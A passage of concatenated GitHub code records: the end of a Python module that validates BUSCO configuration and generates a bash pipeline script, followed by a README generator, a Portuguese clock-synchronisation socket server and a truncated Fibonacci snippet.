error_list.append(f'*** ERROR: the key \"assembly_software\" has to be {get_assembly_software_code_list_text()}.')\n OK = False\n\n # check section \"identification\" - key \"assembly_dataset_id\"\n assembly_dataset_id = busco_option_dict.get('identification', {}).get('assembly_dataset_id', not_found)\n if assembly_dataset_id == not_found:\n error_list.append('*** ERROR: the key \"assembly_dataset_id\" is not found in the section \"identification\".')\n OK = False\n elif not xlib.check_startswith(assembly_dataset_id, get_assembly_software_code_list(), case_sensitive=True):\n error_list.append(f'*** ERROR: the key \"assembly_dataset_id\" has to start with {get_assembly_software_code_list_text()}.')\n OK = False\n\n # check section \"identification\" - key \"assembly_type\"\n assembly_type = busco_option_dict.get('identification', {}).get('assembly_type', not_found)\n if assembly_type == not_found:\n error_list.append('*** ERROR: the key \"assembly_type\" is not found in the section \"identification\".')\n OK = False\n elif assembly_dataset_id.startswith(xlib.get_soapdenovotrans_code()) and assembly_type.upper() not in ['CONTIGS', 'SCAFFOLDS'] or \\\n not assembly_dataset_id.startswith(xlib.get_soapdenovotrans_code()) and assembly_type.upper() != 'NONE':\n error_list.append(f'*** ERROR: the key \"assembly_type\" has to be CONTIGS or SCAFFOLDS in {xlib.get_soapdenovotrans_name()} or NONE in any other case.')\n OK = False\n\n # check section \"BUSCO parameters\"\n if 'BUSCO parameters' not in sections_list:\n error_list.append('*** ERROR: the section \"BUSCO parameters\" is not found.')\n OK = False\n else:\n\n # check section \"BUSCO parameters\" - key \"ncpu\"\n ncpu = busco_option_dict.get('BUSCO parameters', {}).get('ncpu', not_found)\n if ncpu == not_found:\n error_list.append('*** ERROR: the key \"ncpu\" is not found in the section \"BUSCO parameters\".')\n OK = False\n elif not xlib.check_int(ncpu, minimum=1):\n error_list.append('*** ERROR: the key \"ncpu\" has to be an integer number greater than or equal to 1.')\n OK = False\n\n # check section \"BUSCO parameters\" - key \"lineage_data_url\"\n lineage_data_url = busco_option_dict.get('BUSCO parameters', {}).get('lineage_data_url', not_found)\n if lineage_data_url == not_found:\n error_list.append('*** ERROR: the key \"lineage_data_url\" is not found in the section \"BUSCO parameters\"')\n OK = False\n else:\n try:\n urllib.request.urlopen(lineage_data_url)\n except Exception as e:\n error_list.append(f'*** EXCEPTION: \"{e}\".')\n error_list.append('*** ERROR: the key \"lineage_data_url\" has to be a reachable address.')\n OK = False\n\n # check section \"BUSCO parameters\" - key \"mode\"\n mode = busco_option_dict.get('BUSCO parameters', {}).get('mode', not_found)\n if mode == not_found:\n error_list.append('*** ERROR: the key \"mode\" is not found in the section \"BUSCO parameters\".')\n OK = False\n elif not xlib.check_code(mode, get_mode_code_list(), case_sensitive=False):\n error_list.append(f'*** ERROR: the key \"mode\" has to be {get_mode_code_list_text()}.')\n OK = False\n\n # check section \"BUSCO parameters\" - key \"evalue\"\n evalue = busco_option_dict.get('BUSCO parameters', {}).get('evalue', not_found)\n if evalue == not_found:\n error_list.append('*** ERROR: the key \"evalue\" is not found in the section \"BUSCO parameters\".')\n OK = False\n elif not xlib.check_float(evalue, minimum=0., mne=1E-12):\n error_list.append('*** ERROR: the key \"evalue\" has to be a float number greater than 0.')\n OK = False\n\n # check section \"BUSCO parameters\" - key \"limit\"\n limit = busco_option_dict.get('BUSCO parameters', {}).get('limit', not_found)\n if limit == not_found:\n error_list.append('*** ERROR: the key \"limit\" is not found in the section \"BUSCO parameters\".')\n OK = False\n elif not xlib.check_int(limit, minimum=1):\n error_list.append('*** ERROR: the key \"limit\" has to be an integer number greater than or equal to 1.')\n OK = False\n\n # check section \"BUSCO parameters\" - key \"species\"\n species = busco_option_dict.get('BUSCO parameters', {}).get('species', not_found)\n if species == not_found:\n error_list.append('*** ERROR: the key \"species\" is not found in the section \"BUSCO parameters\"')\n OK = False\n\n # check section \"BUSCO parameters\" - key \"long\"\n long = busco_option_dict.get('BUSCO parameters', {}).get('long', not_found)\n if long == not_found:\n error_list.append('*** ERROR: the key \"long\" is not found in the section \"BUSCO parameters\".')\n OK = False\n elif not xlib.check_code(long, get_long_code_list(), case_sensitive=False):\n error_list.append(f'*** ERROR: the key \"long\" has to be {get_long_code_list_text()}.')\n OK = False\n\n # check section \"BUSCO parameters\" - key \"augustus_options\"\n augustus_options = busco_option_dict.get('BUSCO parameters', {}).get('augustus_options', not_found)\n if augustus_options == not_found:\n error_list.append('*** ERROR: the key \"augustus_options\" is not found in the section \"BUSCO parameters\".')\n OK = False\n elif augustus_options.upper() != 'NONE':\n (OK, error_list2) = xlib.check_parameter_list(augustus_options, \"augustus_options\", [])\n error_list = error_list + error_list2\n\n # warn that the results config file is not valid if there are any errors\n if not OK:\n error_list.append(f'\\nThe {xlib.get_busco_name()} config file is not valid. Please, correct this file or recreate it.')\n\n # return the control variable and the error list\n return (OK, error_list)\n\n#-------------------------------------------------------------------------------\n\ndef build_busco_process_script(cluster_name, current_run_dir):\n '''\n Build the current BUSCO process script.\n '''\n\n # initialize the control variable and the error list\n OK = True\n error_list = []\n\n # get the BUSCO option dictionary\n busco_option_dict = xlib.get_option_dict(get_busco_config_file())\n\n # get the options\n experiment_id = busco_option_dict['identification']['experiment_id']\n assembly_software = busco_option_dict['identification']['assembly_software']\n assembly_dataset_id = busco_option_dict['identification']['assembly_dataset_id']\n assembly_type = busco_option_dict['identification']['assembly_type']\n ncpu = busco_option_dict['BUSCO parameters']['ncpu']\n lineage_data_url = busco_option_dict['BUSCO parameters']['lineage_data_url']\n mode = busco_option_dict['BUSCO parameters']['mode'].lower()\n evalue = busco_option_dict['BUSCO parameters']['evalue']\n limit = busco_option_dict['BUSCO parameters']['limit']\n species = busco_option_dict['BUSCO parameters']['species']\n long = busco_option_dict['BUSCO parameters']['long'].upper()\n augustus_options = busco_option_dict['BUSCO parameters']['augustus_options'].upper()\n\n # get the file and name from the lineage data url\n lineage_data_file = lineage_data_url.split(\"/\")[-1]\n # -- lineage_data = lineage_data_file[:lineage_data_file.find('.tar.gz')]\n point_pos = lineage_data_file.find('.')\n lineage_data = lineage_data_file[:point_pos]\n\n # set the transcriptome file path\n if assembly_software == xlib.get_soapdenovotrans_code():\n if assembly_type == 'CONTIGS':\n transcriptome_file = f'{xlib.get_cluster_experiment_result_dataset_dir(experiment_id, assembly_dataset_id)}/{experiment_id}-{assembly_dataset_id}.contig'\n elif assembly_type == 'SCAFFOLDS':\n transcriptome_file = f'{xlib.get_cluster_experiment_result_dataset_dir(experiment_id, assembly_dataset_id)}/{experiment_id}-{assembly_dataset_id}.scafSeq'\n elif assembly_software == xlib.get_transabyss_code():\n transcriptome_file = f'{xlib.get_cluster_experiment_result_dataset_dir(experiment_id, assembly_dataset_id)}/transabyss-final.fa'\n elif assembly_software == xlib.get_trinity_code():\n transcriptome_file = f'{xlib.get_cluster_experiment_result_dataset_dir(experiment_id, assembly_dataset_id)}/Trinity.fasta'\n elif assembly_software == xlib.get_ggtrinity_code():\n transcriptome_file = f'{xlib.get_cluster_experiment_result_dataset_dir(experiment_id, assembly_dataset_id)}/Trinity-GG.fasta'\n elif assembly_software == xlib.get_cd_hit_est_code():\n transcriptome_file = f'{xlib.get_cluster_experiment_result_dataset_dir(experiment_id, assembly_dataset_id)}/clustered-transcriptome.fasta'\n elif assembly_software == xlib.get_transcript_filter_code():\n transcriptome_file = f'{xlib.get_cluster_experiment_result_dataset_dir(experiment_id, assembly_dataset_id)}/filtered-transcriptome.fasta'\n\n # write the BUSCO process script\n try:\n if not os.path.exists(os.path.dirname(get_busco_process_script())):\n os.makedirs(os.path.dirname(get_busco_process_script()))\n with open(get_busco_process_script(), mode='w', encoding='iso-8859-1', newline='\\n') as script_file_id:\n script_file_id.write( '#!/bin/bash\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n script_file_id.write( 'SEP=\"#########################################\"\\n')\n script_file_id.write( 'export HOST_IP=`curl --silent checkip.amazonaws.com`\\n')\n script_file_id.write( 'export HOST_ADDRESS=\"ec2-${HOST_IP//./-}-compute-1.amazonaws.com\"\\n')\n script_file_id.write( 'export AWS_CONFIG_FILE=/home/ubuntu/.aws/config\\n')\n script_file_id.write( 'export AWS_SHARED_CREDENTIALS_FILE=/home/ubuntu/.aws/credentials\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n script_file_id.write(f'MINICONDA3_BIN_PATH={xlib.get_cluster_app_dir()}/{xlib.get_miniconda3_name()}/bin\\n')\n script_file_id.write(f'export PATH=$MINICONDA3_BIN_PATH:$PATH\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n script_file_id.write(f'STATUS_DIR={xlib.get_status_dir(current_run_dir)}\\n')\n script_file_id.write(f'SCRIPT_STATUS_OK={xlib.get_status_ok(current_run_dir)}\\n')\n script_file_id.write(f'SCRIPT_STATUS_WRONG={xlib.get_status_wrong(current_run_dir)}\\n')\n script_file_id.write( 'mkdir --parents $STATUS_DIR\\n')\n script_file_id.write( 'if [ -f $SCRIPT_STATUS_OK ]; then rm $SCRIPT_STATUS_OK; fi\\n')\n script_file_id.write( 'if [ -f $SCRIPT_STATUS_WRONG ]; then rm $SCRIPT_STATUS_WRONG; fi\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n script_file_id.write(f'CURRENT_DIR={current_run_dir}\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n script_file_id.write( 'function init\\n')\n script_file_id.write( '{\\n')\n script_file_id.write( ' INIT_DATETIME=`date --utc +%s`\\n')\n script_file_id.write( ' FORMATTED_INIT_DATETIME=`date --date=\"@$INIT_DATETIME\" \"+%Y-%m-%d %H:%M:%S\"`\\n')\n script_file_id.write( ' echo \"$SEP\"\\n')\n script_file_id.write( ' echo \"Script started at $FORMATTED_INIT_DATETIME+00:00.\"\\n')\n script_file_id.write( ' echo \"$SEP\"\\n')\n script_file_id.write(f' echo \"CLUSTER: {cluster_name}\"\\n')\n script_file_id.write( ' echo \"HOST NAME: $HOSTNAME\"\\n')\n script_file_id.write( ' echo \"HOST IP: $HOST_IP\"\\n')\n script_file_id.write( ' echo \"HOST ADDRESS: $HOST_ADDRESS\"\\n')\n script_file_id.write( '}\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n script_file_id.write( 'function download_lineage_data\\n')\n script_file_id.write( '{\\n')\n script_file_id.write( ' cd $CURRENT_DIR\\n')\n script_file_id.write( ' echo \"$SEP\"\\n')\n script_file_id.write( ' echo \"Downloading lineage data ...\"\\n')\n download_script = f'import requests; r = requests.get(\\'{lineage_data_url}\\') ; open(\\'{lineage_data_file}\\' , \\'wb\\').write(r.content)'\n script_file_id.write(f' $MINICONDA3_BIN_PATH/python3 -c \"{download_script}\"\\n')\n script_file_id.write( ' RC=$?\\n')\n script_file_id.write( ' if [ $RC -ne 0 ]; then manage_error download_script $RC; fi\\n')\n script_file_id.write(f' tar -xzvf ./{lineage_data_file}\\n')\n script_file_id.write( ' RC=$?\\n')\n script_file_id.write( ' if [ $RC -ne 0 ]; then manage_error tar $RC; fi\\n')\n script_file_id.write(f' rm ./{lineage_data_file}\\n')\n script_file_id.write( ' RC=$?\\n')\n script_file_id.write( ' if [ $RC -ne 0 ]; then manage_error rm $RC; fi\\n')\n script_file_id.write( ' echo \"Lineage data are downloaded.\"\\n')\n script_file_id.write( '}\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n script_file_id.write( 'function run_busco_process\\n')\n script_file_id.write( '{\\n')\n script_file_id.write(f' source activate {xlib.get_busco_anaconda_code()}\\n')\n script_file_id.write( ' cd $CURRENT_DIR\\n')\n script_file_id.write( ' echo \"$SEP\"\\n')\n script_file_id.write( ' echo \"Assessing the transcriptome quality ...\"\\n')\n script_file_id.write( ' /usr/bin/time \\\\\\n')\n script_file_id.write(f' --format=\"{xlib.get_time_output_format(separator=False)}\" \\\\\\n')\n script_file_id.write( ' busco \\\\\\n')\n script_file_id.write(f' --cpu={ncpu} \\\\\\n')\n script_file_id.write(f' --lineage_dataset=./{lineage_data} \\\\\\n')\n script_file_id.write(f' --mode={mode} \\\\\\n')\n script_file_id.write(f' --evalue={evalue} \\\\\\n')\n script_file_id.write(f' --limit={limit} \\\\\\n')\n if species.upper() != 'NONE':\n script_file_id.write(f' --species={species} \\\\\\n')\n if long == 'YES':\n script_file_id.write( ' --long \\\\\\n')\n if augustus_options.upper() != 'NONE':\n script_file_id.write(f' --august_options=\"{augustus_options}\" \\\\\\n')\n script_file_id.write(f' --in={transcriptome_file} \\\\\\n')\n script_file_id.write(f' --out={os.path.basename(current_run_dir)}\\n')\n script_file_id.write( ' RC=$?\\n')\n script_file_id.write( ' if [ $RC -ne 0 ]; then manage_error run_BUSCO.py $RC; fi\\n')\n script_file_id.write( ' echo \"The assessment is done.\"\\n')\n script_file_id.write( ' conda deactivate\\n')\n script_file_id.write( '}\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n script_file_id.write( 'function end\\n')\n script_file_id.write( '{\\n')\n script_file_id.write( ' END_DATETIME=`date --utc +%s`\\n')\n script_file_id.write( ' FORMATTED_END_DATETIME=`date --date=\"@$END_DATETIME\" \"+%Y-%m-%d %H:%M:%S\"`\\n')\n script_file_id.write( ' calculate_duration\\n')\n script_file_id.write( ' echo \"$SEP\"\\n')\n script_file_id.write( ' echo \"Script ended OK at $FORMATTED_END_DATETIME+00:00 with a run duration of $DURATION s ($FORMATTED_DURATION).\"\\n')\n script_file_id.write( ' echo \"$SEP\"\\n')\n script_file_id.write( ' send_mail ok\\n')\n script_file_id.write( ' touch $SCRIPT_STATUS_OK\\n')\n script_file_id.write( ' exit 0\\n')\n script_file_id.write( '}\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n script_file_id.write( 'function manage_error\\n')\n script_file_id.write( '{\\n')\n script_file_id.write( ' END_DATETIME=`date --utc +%s`\\n')\n script_file_id.write( ' FORMATTED_END_DATETIME=`date --date=\"@$END_DATETIME\" \"+%Y-%m-%d %H:%M:%S\"`\\n')\n script_file_id.write( ' calculate_duration\\n')\n script_file_id.write( ' echo \"$SEP\"\\n')\n script_file_id.write( ' echo \"ERROR: $1 returned error $2\"\\n')\n script_file_id.write( ' echo \"Script ended WRONG at $FORMATTED_END_DATETIME+00:00 with a run duration of $DURATION s ($FORMATTED_DURATION).\"\\n')\n script_file_id.write( ' echo \"$SEP\"\\n')\n script_file_id.write( ' send_mail wrong\\n')\n script_file_id.write( ' touch $SCRIPT_STATUS_WRONG\\n')\n script_file_id.write( ' exit 3\\n')\n script_file_id.write( '}\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n process_name = f'{xlib.get_busco_name()} process'\n mail_message_ok = xlib.get_mail_message_ok(process_name, cluster_name)\n mail_message_wrong = xlib.get_mail_message_wrong(process_name, cluster_name)\n script_file_id.write( 'function send_mail\\n')\n script_file_id.write( '{\\n')\n script_file_id.write(f' SUBJECT=\"{xlib.get_project_name()}: {process_name}\"\\n')\n script_file_id.write( ' if [ \"$1\" == \"ok\" ]; then\\n')\n script_file_id.write(f' MESSAGE=\"{mail_message_ok}\"\\n')\n script_file_id.write( ' elif [ \"$1\" == \"wrong\" ]; then\\n')\n script_file_id.write(f' MESSAGE=\"{mail_message_wrong}\"\\n')\n script_file_id.write( ' else\\n')\n script_file_id.write( ' MESSAGE=\"\"\\n')\n script_file_id.write( ' fi\\n')\n script_file_id.write( ' DESTINATION_FILE=mail-destination.json\\n')\n script_file_id.write( ' echo \"{\" > $DESTINATION_FILE\\n')\n script_file_id.write(f' echo \" \\\\\\\"ToAddresses\\\\\\\": [\\\\\\\"{xconfiguration.get_contact_data()}\\\\\\\"],\" >> $DESTINATION_FILE\\n')\n script_file_id.write( ' echo \" \\\\\\\"CcAddresses\\\\\\\": [],\" >> $DESTINATION_FILE\\n')\n script_file_id.write( ' echo \" \\\\\\\"BccAddresses\\\\\\\": []\" >> $DESTINATION_FILE\\n')\n script_file_id.write( ' echo \"}\" >> $DESTINATION_FILE\\n')\n script_file_id.write( ' MESSAGE_FILE=mail-message.json\\n')\n script_file_id.write( ' echo \"{\" > $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \" \\\\\\\"Subject\\\\\\\": {\" >> $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \" \\\\\\\"Data\\\\\\\": \\\\\\\"$SUBJECT\\\\\\\",\" >> $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \" \\\\\\\"Charset\\\\\\\": \\\\\\\"UTF-8\\\\\\\"\" >> $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \" },\" >> $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \" \\\\\\\"Body\\\\\\\": {\" >> $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \" \\\\\\\"Html\\\\\\\": {\" >> $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \" \\\\\\\"Data\\\\\\\": \\\\\\\"$MESSAGE\\\\\\\",\" >> $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \" \\\\\\\"Charset\\\\\\\": \\\\\\\"UTF-8\\\\\\\"\" >> $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \" }\" >> $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \" }\" >> $MESSAGE_FILE\\n')\n script_file_id.write( ' echo \"}\" >> $MESSAGE_FILE\\n')\n script_file_id.write(f' aws ses send-email --from {xconfiguration.get_contact_data()} --destination file://$DESTINATION_FILE --message file://$MESSAGE_FILE\\n')\n script_file_id.write( '}\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n script_file_id.write( 'function calculate_duration\\n')\n script_file_id.write( '{\\n')\n script_file_id.write( ' DURATION=`expr $END_DATETIME - $INIT_DATETIME`\\n')\n script_file_id.write( ' HH=`expr $DURATION / 3600`\\n')\n script_file_id.write( ' MM=`expr $DURATION % 3600 / 60`\\n')\n script_file_id.write( ' SS=`expr $DURATION % 60`\\n')\n script_file_id.write( ' FORMATTED_DURATION=`printf \"%03d:%02d:%02d\\\\n\" $HH $MM $SS`\\n')\n script_file_id.write( '}\\n')\n script_file_id.write( '#-------------------------------------------------------------------------------\\n')\n script_file_id.write( 'init\\n')\n script_file_id.write( 'download_lineage_data\\n')\n script_file_id.write( 'run_busco_process\\n')\n script_file_id.write( 'end\\n')\n except Exception as e:\n error_list.append(f'*** EXCEPTION: \"{e}\".')\n error_list.append(f'*** ERROR: The file {get_busco_process_script()} can not be created')\n OK = False\n\n # return the control variable and the error list\n return (OK, error_list)\n\n#-------------------------------------------------------------------------------\n\ndef build_busco_process_starter(current_run_dir):\n '''\n Build the starter of the current BUSCO process.\n '''\n\n # initialize the control variable and the error list\n OK = True\n error_list = []\n\n # write the BUSCO process starter\n try:\n if not os.path.exists(os.path.dirname(get_busco_process_starter())):\n os.makedirs(os.path.dirname(get_busco_process_starter()))\n with open(get_busco_process_starter(), mode='w', encoding='iso-8859-1', newline='\\n') as file_id:\n file_id.write( '#!/bin/bash\\n')\n file_id.write( '#-------------------------------------------------------------------------------\\n')\n file_id.write(f'{current_run_dir}/{os.path.basename(get_busco_process_script())} &>>{current_run_dir}/{xlib.get_cluster_log_file()}\\n')\n except Exception as e:\n error_list.append(f'*** EXCEPTION: \"{e}\".')\n error_list.append(f'*** ERROR: The file {get_busco_process_starter()} can not be created')\n OK = False\n\n # return the control variable and the error list\n return (OK, error_list)\n\n#-------------------------------------------------------------------------------\n\ndef get_busco_config_file():\n '''\n Get the BUSCO config file path.\n '''\n\n # assign the BUSCO config file path\n busco_config_file = f'{xlib.get_config_dir()}/{xlib.get_busco_code()}-config.txt'\n\n # return the BUSCO config file path\n return busco_config_file\n\n#-------------------------------------------------------------------------------\n\ndef get_busco_process_script():\n '''\n Get the BUSCO process script path in the local computer.\n '''\n\n # assign the BUSCO script path\n busco_process_script = f'{xlib.get_temp_dir()}/{xlib.get_busco_code()}-process.sh'\n\n # return the BUSCO script path\n return busco_process_script\n\n#-------------------------------------------------------------------------------\n\ndef get_busco_process_starter():\n '''\n Get the BUSCO process starter path in the local computer.\n '''\n\n # assign the BUSCO process starter path\n busco_process_starter = f'{xlib.get_temp_dir()}/{xlib.get_busco_code()}-process-starter.sh'\n\n # return the BUSCO starter path\n return busco_process_starter\n\n#-------------------------------------------------------------------------------\n \ndef get_assembly_software_code_list():\n '''\n Get the code list of \"assembly_software\".\n '''\n\n return [xlib.get_soapdenovotrans_code(), xlib.get_transabyss_code(), xlib.get_trinity_code(), xlib.get_ggtrinity_code(), xlib.get_cd_hit_est_code(), xlib.get_transcript_filter_code()]\n\n#-------------------------------------------------------------------------------\n \ndef get_assembly_software_code_list_text():\n '''\n Get the code list of \"assembly_software\" as text.\n '''\n\n return f'{xlib.get_soapdenovotrans_code()} ({xlib.get_soapdenovotrans_name()}) or {xlib.get_transabyss_code()} ({xlib.get_transabyss_name()}) or {xlib.get_trinity_code()} ({xlib.get_trinity_name()}) or {xlib.get_ggtrinity_code()} ({xlib.get_ggtrinity_name()}) or {xlib.get_cd_hit_est_code()} ({xlib.get_cd_hit_est_name()}) or {xlib.get_transcript_filter_code()} ({xlib.get_transcript_filter_name()})'\n\n#-------------------------------------------------------------------------------\n \ndef get_mode_code_list():\n '''\n Get the code list of \"mode\".\n '''\n\n return ['GENO', 'TRAN', 'PROT']\n\n#-------------------------------------------------------------------------------\n \ndef get_mode_code_list_text():\n '''\n Get the code list of \"mode\".\n '''\n\n return 'GENO (genome assemblies, DNA) or TRAN (transcriptome assemblies, DNA) or PROT (annotated gene sets, proteins)'\n\n#-------------------------------------------------------------------------------\n \ndef get_long_code_list():\n '''\n Get the code list of \"long\".\n '''\n\n return ['YES', 'NO']\n\n#-------------------------------------------------------------------------------\n \ndef get_long_code_list_text():\n '''\n Get the code list of \"long\" as text.\n '''\n\n return str(get_long_code_list()).strip('[]').replace('\\'','').replace(',', ' or')\n\n#-------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n print('This file contains functions related to the BUSCO process used in both console mode and gui mode.')\n sys.exit(0)\n\n#-------------------------------------------------------------------------------\n","repo_name":"GGFHF/NGScloud2","sub_path":"Package/xbusco.py","file_name":"xbusco.py","file_ext":"py","file_size_in_byte":43029,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"8181794301","text":"import os, glob\n\n\n# Header:\ndata = \"# Tutorials\\n\"\n\ndata += \"\"\"\n> This section is purposed for local tutorial backup. \\\nTutorials divides into several section. find the links to\nthose sections.\n\n### Topic:\n\"\"\"\n\nfor dir in glob.glob(\".././tutorials/*\"):\n name = os.path.basename(dir)\n data += \"- [%s](./tutorials/%s/README.md)\\n\" % (name, name)\n\n\nwith open(\".././README.md\", \"w+\") as f:\n f.write(data)\n f.close()\n \n ","repo_name":"JunruTao/Peach","sub_path":"tutorials/scripts/configure_main_readme.py","file_name":"configure_main_readme.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7543809862","text":"# import socket programming library\nimport socket\nfrom _thread import *\nimport threading\nfrom random import randint\nimport time\n\n# Armazena relógio (em segundos). Funciona como uma variável global\nlocalTime = [time.time()]\n\n# Lista auxiliar que armazenará todos os relógios.\nremoteTimes = []\n\n# Lista que guardará todos os endereços e portas dos clientes.\nprocessos = []\n\n# Lock usado como semáforo para conexões\nprint_lock = threading.Lock()\n\n\n# Função que será usada em thread para coletar o relógio de um cliente\ndef coletarHorario(host, port):\n\t# Estabelece conexão com o cliente\n\ts = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\ts.connect((host,port))\n\n\t# Envia um requisito REQUEST_TIME\n\tprint(\"Enviando REQUEST_TIME para \" + str(host) + \":\" + str(port))\n\ts.send(\"REQUEST_TIME\\n\".encode())\n\n\t# Aguarda e recebe o relógio do cliente.\n\tdata = s.recv(1024).decode()\n\n\t# Encerra a conexão\n\ts.close()\n\n\t# Adiciona o relógio na lista remoteTimes (Que será usada para calcular média)\n\tremoteTimes.append(float(data))\n\n\n# Função que sera usada em thread para enviar o novo relógio\ndef enviarHorario(host, port, newTime):\n\t# Estabelece conexão com o cliente\n\ts = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\ts.connect((host,port))\n\n\t# Prepara mensagem ( transforma em string o relógio)\n\tmessage = str(newTime) + \"\\n\"\n\tprint(\"Enviando novo time para \" + str(host) + \":\" + str(port))\n\n\t# Envia mensagem e fecha conexão\n\ts.send(message.encode())\n\ts.close()\n\n\n# Função que será usada para processar o envio de temperatura de um cliente\ndef threaded(c):\n\t\n\t# Obtem a informação, libera o lock e fecha a conexão\n\tdata = c.recv(1024).decode()\n\t# data = c.recv(1024)\n\t#data = c.recv(1024)\n\tprint_lock.release()\n\tc.close()\n\n\tprint(\"Recebeu dado bruto: {}\".format(data))\n\n\t# Prepara a mensagem separando a temperatura do relógio\n\t# msg = ['TEMPERATURA','RELOGIO']\n\tmsg = data.split(\"@\")\n\n\tprint(\"Recebeu temperatura: {}\".format(msg[0]))\n\tprint(\"Recebeu timestamp: {:.2f}\".format(float(msg[1])))\n\n\t# Obtem a diferença entre o relógio local e o relógio do cliente\n\tdiff = float(localTime[0]) - float(msg[1])\n\t\n\t# Se a diferença for maior que 1, iniciar processo de atualização\n\tif (diff > 1 or diff < -1):\n\t\tprint(\"\\nDiferença de time: {}\".format(diff))\n\t\tprint(\"Discrepancia detectada.\\n\")\n\n\t\t# Limpa a lista remoteTimes que receberá os relógios de todos os processos.\n\t\tremoteTimes.clear()\n\n\t\t# Adiciona o relógio local ao remoteTimes\n\t\tremoteTimes.append(localTime[0])\n\n\t\t# Declara uma lista vazia my_threads que armazenara threads que serão executadas em breve\n\t\tmy_threads = []\n\n\t\t# Cria uma thread de requisição de relógio para cada cliente (Não executa ela ainda)\n\t\tfor processo in processos:\n\t\t\tmy_threads.append(threading.Thread(target=coletarHorario, args=(processo[0],processo[1],)))\n\n\t\t# Executa todas as threads\n\t\tfor thread in my_threads:\n\t\t\tthread.start()\n\t\t\n\t\t# Cria joins nas threads para que a execução só continue depois que todas as threads concluirem\n\t\tfor thread in my_threads:\n\t\t\tthread.join()\n\n\t\t# A esse ponto, o remoteTimes deveria ter todos os relógios dos processos\n\n\t\t# Calcular novo horario\n\t\tnewTime = sum(remoteTimes) / len(remoteTimes)\n\n\t\t# Atualiza relógio local\n\t\tlocalTime[0] = newTime\n\n\n\t\tprint(\"\\nNovo time que sera enviado: {:.2f}\\n\".format(newTime))\n\t\t\n\t\t# Enviar novo horario para os clientes\n\t\t# Esvazia o my_threads\n\t\tmy_threads = []\n\n\t\t# Prepara uma thread de envio de relógio para cada cliente (Não executa ela ainda)\n\t\tfor processo in processos:\n\t\t\tmy_threads.append(threading.Thread(target=enviarHorario, args=(processo[0],processo[1], newTime,)))\n\n\t\t# Executa todas as threads\n\t\tfor thread in my_threads:\n\t\t\tthread.start()\n\t\t\n\t\t# Cria joins nas threads para que a execução só continue depois que todas as threads concluirem\n\t\tfor thread in my_threads:\n\t\t\tthread.join()\n\n\t\t# Fim\n\telse:\n\t\tprint(\"\\nDiferença de time: {}\".format(diff))\n\t\tprint(\"Tudo OK.\\n\")\n\t\t\n\tprint()\n\t\n\n# Thread de clock do processo\ndef thread_clock():\n\tcount = 0.0\n\thz = 0.5\n\n\twhile True:\n\t\t\n\t\t# Aguarda 0.5 segundos\n\t\ttime.sleep(hz)\n\n\t\t# Adiciona 0.5 no relogio local e no counter\n\t\tlocalTime[0]+=hz\n\t\tcount += hz\n\n\t\t# Após 10 segundos, há 33% de chance de ser adicionado ou removido 2 segundos ao invez do padrao 0.5\n\t\tif (count > 10.0 and randint(0,2) == 0):\n\t\t\t\n\t\t\tcount = 0.0\n\n\t\t\tif (randint(0,1) == 0):\n\t\t\t\tlocalTime[0]+= 2.0\n\t\t\t\tprint(\"\\nANOMALIA OCORREU! +2 segundos!\\n\")\n\t\t\telse:\n\t\t\t\tlocalTime[0]-= 2.0\n\t\t\t\tprint(\"\\nANOMALIA OCORREU! -2 segundos!\\n\")\n\n \ndef Main():\n\n\t# Inicia a thread de clock que atuliza o relogio local\n\tstart_new_thread(thread_clock, ())\n\n\thost = \"\"\n\tport = 8000\n\n\t# Adiciona os endereços e portas de cada cliente à lista processos\n\tprocessos.append(['127.0.0.1',8001])\n\tprocessos.append(['127.0.0.1',8002])\n \n\t# Cria um socket para ouvir e receber envios de temperatura dos clientes\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.bind((host, port))\n\ts.listen(5)\n\tprint(\"Socket escutando, aguardando envios...\\n\")\n\n\t# Loop sem fim para receber envios de clientes\n\twhile True:\n \n\t\t# Estabelece conexao com cliente\n\t\tc, addr = s.accept()\n\t\tprint('Conectou a:', str(addr[0]) + ':' + str(addr[1]))\n \n\t\t# Obtem um lock para funcionar como semáforo\n\t\tprint_lock.acquire()\n\t\t\n\t\t# Inicia uma nova thread para tratar a conexão\n\t\tstart_new_thread(threaded, (c,))\n\n\ts.close()\n \n\nif __name__ == '__main__':\n\tMain()\n","repo_name":"brunoorlandin/clockSync","sub_path":"serverPython.py","file_name":"serverPython.py","file_ext":"py","file_size_in_byte":5418,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70420499607","text":"\"\"\"\nPrints the number of calls of a recursive Fibonacci\nfunction with problem sizes that double.\n\"\"\"\nimport math\nfrom math import *\nimport numpy as np\nimport random\nfrom collections import *\nfrom collections import Counter\ndef fib(n, counter):\n\t##Count the number of calls of the fibonacci function.##\n\tcounter.increment()\n\tif n < 3:\n\t\treturn 1\n\telse:\n\t\treturn fib(n - 1, counter) + fib(n - 2, counter)\n\tproblemSize = 2\n\tprint(\"%12s%15s\" % 